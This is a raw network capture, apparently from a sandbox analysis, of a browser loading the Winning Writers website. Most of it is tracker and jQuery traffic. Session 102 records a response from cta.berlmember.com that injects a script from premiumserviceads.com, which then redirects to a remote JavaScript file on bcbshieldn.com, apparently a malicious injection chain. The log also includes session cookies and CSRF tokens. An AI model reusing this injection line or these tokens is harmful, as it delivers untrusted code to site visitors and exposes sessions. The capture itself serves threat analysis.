                                                                                                                                                                                            2024-11-18 20:00:10 UTC400INHTTP/1.1 200 OK
                                                                                                                                                                                            date: Mon, 18 Nov 2024 20:00:10 GMT
                                                                                                                                                                                            perf: 7402827104
                                                                                                                                                                                            server: tsa_b
                                                                                                                                                                                            content-type: image/gif;charset=utf-8
                                                                                                                                                                                            cache-control: no-cache, no-store, max-age=0
                                                                                                                                                                                            content-length: 43
                                                                                                                                                                                            x-transaction-id: a0d7fb935f5625a6
                                                                                                                                                                                            strict-transport-security: max-age=631138519
                                                                                                                                                                                            x-response-time: 5
                                                                                                                                                                                            x-connection-hash: 2e0f68155eb083a7e5bd0187f213e36f24f385b14bf5c5f9d001097a5e101fe5
                                                                                                                                                                                            connection: close
                                                                                                                                                                                            2024-11-18 20:00:10 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 09 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                                            Data Ascii: GIF89a!,L;


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            96192.168.2.1649827142.250.186.1324436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1136OUTGET /pagead/1p-user-list/1072733940/?random=1731960006858&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSGwCa7L7d8_tahwouFkWEMPhMGqs141QoAhXnsQ&random=2808805193&rmt_tld=0&ipr=y HTTP/1.1
                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:11 UTC602INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:10 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                            Content-Type: image/gif
                                                                                                                                                                                            Content-Security-Policy: script-src 'none'; object-src 'none'
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            Content-Length: 42
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            2024-11-18 20:00:11 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                            Data Ascii: GIF89a!,D;


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            97192.168.2.164983066.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:10 UTC920OUTGET /assets/js/jquery.cookie.js HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960008.60.0.0; _ga=GA1.1.723902191.1731960008
                                                                                                                                                                                            2024-11-18 20:00:11 UTC365INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:10 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "c31-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 3121
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:10 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                            2024-11-18 20:00:11 UTC3121INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 43 6f 6f 6b 69 65 20 50 6c 75 67 69 6e 20 76 31 2e 34 2e 30 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 63 61 72 68 61 72 74 6c 2f 6a 71 75 65 72 79 2d 63 6f 6f 6b 69 65 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 33 20 4b 6c 61 75 73 20 48 61 72 74 6c 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 20 28 66 61 63 74 6f 72 79 29 20 7b 0a 09 69 66 20 28 74 79 70 65 6f 66 20 64 65 66 69 6e 65 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 20 26 26 20 64 65 66 69 6e 65 2e 61 6d 64 29 20 7b 0a 09 09 2f 2f 20 41 4d 44 0a 09 09 64 65 66 69 6e 65 28 5b 27 6a 71 75 65 72 79 27 5d 2c 20 66
                                                                                                                                                                                            Data Ascii: /*! * jQuery Cookie Plugin v1.4.0 * https://github.com/carhartl/jquery-cookie * * Copyright 2013 Klaus Hartl * Released under the MIT license */(function (factory) {if (typeof define === 'function' && define.amd) {// AMDdefine(['jquery'], f


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            98192.168.2.1649834151.101.65.1404436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:10 UTC397OUTOPTIONS /reports HTTP/1.1
                                                                                                                                                                                            Host: w3-reporting-nel.reddit.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Origin: https://alb.reddit.com
                                                                                                                                                                                            Access-Control-Request-Method: POST
                                                                                                                                                                                            Access-Control-Request-Headers: content-type
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:11 UTC644INHTTP/1.1 204 No Content
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Server: Varnish
                                                                                                                                                                                            Retry-After: 0
                                                                                                                                                                                            Access-Control-Allow-Origin: https://alb.reddit.com
                                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                            Access-Control-Allow-Methods: POST, OPTIONS
                                                                                                                                                                                            Access-Control-Allow-Headers: Content-Type,Origin,X-origination-host,X-origination-path
                                                                                                                                                                                            Access-Control-Expose-Headers: *
                                                                                                                                                                                            Access-Control-Max-Age: 86400
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:10 GMT
                                                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                                                            Vary: Origin
                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                            X-XSS-Protection: 1; mode=block


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            99192.168.2.1649828184.28.90.27443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:10 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                            Range: bytes=0-2147483646
                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                            2024-11-18 20:00:11 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                            ApiVersion: Distribute 1.1
                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                            Server: ECAcc (lpl/EF06)
                                                                                                                                                                                            X-CID: 11
                                                                                                                                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                            X-Ms-Region: prod-weu-z1
                                                                                                                                                                                            Cache-Control: public, max-age=161074
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:11 GMT
                                                                                                                                                                                            Content-Length: 55
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            X-CID: 2
                                                                                                                                                                                            2024-11-18 20:00:11 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            100192.168.2.164983366.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:10 UTC929OUTGET /assets/js/jquery.matchHeight-min.js HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960008.60.0.0; _ga=GA1.1.723902191.1731960008
                                                                                                                                                                                            2024-11-18 20:00:11 UTC365INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:11 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "d35-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 3381
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:11 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                            2024-11-18 20:00:11 UTC3381INData Raw: 2f 2a 0a 2a 20 6a 71 75 65 72 79 2d 6d 61 74 63 68 2d 68 65 69 67 68 74 20 30 2e 37 2e 32 20 62 79 20 40 6c 69 61 62 72 75 0a 2a 20 68 74 74 70 3a 2f 2f 62 72 6d 2e 69 6f 2f 6a 71 75 65 72 79 2d 6d 61 74 63 68 2d 68 65 69 67 68 74 2f 0a 2a 20 4c 69 63 65 6e 73 65 20 4d 49 54 0a 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 74 29 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 72 65 71 75 69 72 65 28 22 6a 71 75 65 72
                                                                                                                                                                                            Data Ascii: /** jquery-match-height 0.7.2 by @liabru* http://brm.io/jquery-match-height/* License MIT*/!function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],t):"undefined"!=typeof module&&module.exports?module.exports=t(require("jquer


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            101192.168.2.164983174.125.206.1574436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:10 UTC688OUTGET /j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-216038-1&cid=723902191.1731960008&jid=878809402&gjid=1037938329&_gid=1788557778.1731960008&_u=YGBAgEABAAAAAGAAI~&z=1716026079 HTTP/1.1
                                                                                                                                                                                            Host: stats.g.doubleclick.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: IDE=AHWqTUmU9BrGmowYeEAFj63Amj7wo1xzgFQYDE60tcJ3OfQMbNLJMYVdUCk56ely
                                                                                                                                                                                            2024-11-18 20:00:11 UTC928INHTTP/1.1 200 OK
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:11 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                            Last-Modified: Sun, 17 May 1998 03:00:00 GMT
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsgdc:149:0
                                                                                                                                                                                            Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting
                                                                                                                                                                                            Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsgdc:149:0"}],}
                                                                                                                                                                                            Server: Golfe2
                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            2024-11-18 20:00:11 UTC1INData Raw: 31
                                                                                                                                                                                            Data Ascii: 1


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            102192.168.2.1649818103.52.144.2144436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:11 UTC359OUTGET /google/jquery.php HTTP/1.1
                                                                                                                                                                                            Host: cta.berlmember.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:11 UTC219INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:11 GMT
                                                                                                                                                                                            Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
                                                                                                                                                                                            X-Powered-By: PHP/7.3.10
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            2024-11-18 20:00:11 UTC90INData Raw: 35 34 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 72 65 6d 69 75 6d 73 65 72 76 69 63 65 61 64 73 2e 63 6f 6d 2f 79 4a 75 69 44 22 20 64 65 66 65 72 3e 3c 2f 73 63 72 69 70 74 3e 27 29 3b 0d 0a
                                                                                                                                                                                            Data Ascii: 54document.write('<script src="https://premiumserviceads.com/yJuiD" defer></script>');
                                                                                                                                                                                            2024-11-18 20:00:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            103192.168.2.164983766.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:11 UTC911OUTGET /assets/js/feed.js HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960008.60.0.0; _ga=GA1.1.723902191.1731960008
                                                                                                                                                                                            2024-11-18 20:00:11 UTC364INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:11 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "2f2-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 754
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:11 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                            2024-11-18 20:00:11 UTC754INData Raw: 0a 2f 2f 20 76 61 72 20 24 20 3d 20 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 28 29 3b 0a 0a 2f 2f 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 0a 2f 2f 20 20 20 20 20 69 66 20 28 24 28 77 69 6e 64 6f 77 29 2e 77 69 64 74 68 28 29 20 3e 20 34 39 39 29 20 7b 0a 2f 2f 20 20 20 20 20 20 20 20 20 69 66 28 24 28 27 2e 66 65 65 64 2d 68 65 69 67 68 74 27 29 2e 6c 65 6e 67 74 68 20 3e 20 30 29 7b 0a 2f 2f 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 2e 66 65 65 64 2d 68 65 69 67 68 74 27 29 2e 6d 61 74 63 68 48 65 69 67 68 74 28 7b 0a 2f 2f 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 79 52 6f 77 3a 20 66 61 6c 73 65 0a 2f 2f 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 2f 2f 20 20
                                                                                                                                                                                            Data Ascii: // var $ = jQuery.noConflict();// $(document).ready(function () {// if ($(window).width() > 499) {// if($('.feed-height').length > 0){// $('.feed-height').matchHeight({// byRow: false// });//


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            104192.168.2.164983594.141.120.124436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:11 UTC528OUTGET /yJuiD HTTP/1.1
                                                                                                                                                                                            Host: premiumserviceads.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:11 UTC520INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:11 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            X-Powered-By: PHP/8.3.13
                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Set-Cookie: PHPSESSID=bt441dujdfvnlt5g17j1942eau; path=/
                                                                                                                                                                                            Set-Cookie: short_15=1; expires=Mon, 18 Nov 2024 20:15:11 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                                                                                                            location: https://bcbshieldn.com/cflaer.js
                                                                                                                                                                                            X-Powered-By: PleskLin


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            105192.168.2.1649836157.240.253.354436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:11 UTC672OUTGET /tr/?id=188856481728275&ev=PageView&dl=https%3A%2F%2Fwinningwriters.com%2F&rl=&if=false&ts=1731960008622&cd[eventID]=event.id.17319600027701&sw=1280&sh=1024&v=2.9.177&r=stable&ec=0&o=4126&fbp=fb.1.1731960008619.29400145611624610&cs_est=true&ler=empty&cdl=API_unavailable&it=1731960007055&coo=false&eid=event.id.17319600027701&rqm=GET HTTP/1.1
                                                                                                                                                                                            Host: www.facebook.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:11 UTC465INHTTP/1.1 200 OK
                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                            Access-Control-Allow-Origin:
                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                            Server: proxygen-bolt
                                                                                                                                                                                            X-FB-Connection-Quality: GOOD; q=0.7, rtt=119, rtx=0, c=10, mss=1380, tbw=3407, tp=-1, tpl=-1, uplat=0, ullat=0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:11 GMT
